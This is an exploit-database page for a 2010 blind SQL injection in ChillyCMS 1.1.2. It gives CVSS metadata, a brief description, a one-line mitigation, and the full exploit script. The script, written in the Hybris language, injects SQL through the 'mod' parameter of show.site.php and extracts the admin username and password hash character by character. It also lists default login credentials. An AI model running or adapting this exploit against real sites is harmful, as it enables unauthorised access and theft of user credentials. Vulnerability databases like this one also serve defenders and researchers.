header-logo
Suggest Exploit
vendor:
ChillyCMS
by:
IHTeam
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ChillyCMS
Affected Version From: 1.1.2
Affected Version To: 1.1.2
Patch Exists: NO
Related CWE: N/A
CPE: a:chillycms:chillycms:1.1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win/Linux
2010

ChillyCMS Blind Sql Injection

ChillyCMS is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability to gain access to the system's user credentials. The exploit code uses Hybris to search for the username and MD5 hash of the user. The default username and password are jens and demo respectively.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

#!/usr/bin/hybris
#################################################################################
#
# Exploit Title: ChillyCMS Blind Sql Injection
# Date: 14-05-2010
# Author: IHTeam
# Software Link:
http://chillycms.bplaced.net/chillyCMS/core/show.site.php?id=9
# Version: 1.1.2
# Tested on: Win/Linux
#
#
# Example:
# [user@user Advisories]$ hybris chillycms.hy
# Searching Username... :
# admin
# Searching MD5... :
# d033e22ae348aeb5660fc2140aec35850c4da997
#
#
# DEFAULT USERNAME AND PASSWORD:
# User: jens
# Pass: demo
#
# Thanks to evilsocket for Hybris
# http://www.hybris-lang.org/
#################################################################################

import std.*;

query1 = "4/**/AND/**/(SELECT/**/SUBSTRING(";
query2 = ")/**/FROM/**/system_users/**/limit/**/0,1)=char(";

chars =
[48:0,49:1,50:2,51:3,52:4,53:5,54:6,55:7,56:8,57:9,97:'a',98:'b',99:'c',100:'d',101:'e',102:'f'];
usr = "";
password = "";

i=1;
println("Searching Username... : ");
while(1) {
found=false;
chrs = 'a' .. 'z';
foreach(char of chrs) {
_chrs = toint(char);
url =
"/chillyCMS/core/show.site.php?editprofile&mod="+query1+"user,"+i+",1"+query2+_chrs+")";
html = http_get( "http://localhost", url );
if (html ~= "/name='user'/") {
usr += char;
i+=1;
found=true;
}
}
if (!found) {
break;
}
}
println(usr);

i=1;
println("Searching MD5... : ");
while(1) {
found=false;
foreach(char of chars.keys()) {
url =
"/chillyCMS/core/show.site.php?editprofile&mod="+query1+"pw,"+i+",1"+query2+char+")";
html = http_get( "http://localhost", url );
if (html ~= "/name='user'/") {
password += chars[char];
i+=1;
found=true;
}
}
if (!found) {
break;
}
}
println(password);
println();

Navigation

Suggest Exploit

Services By CQR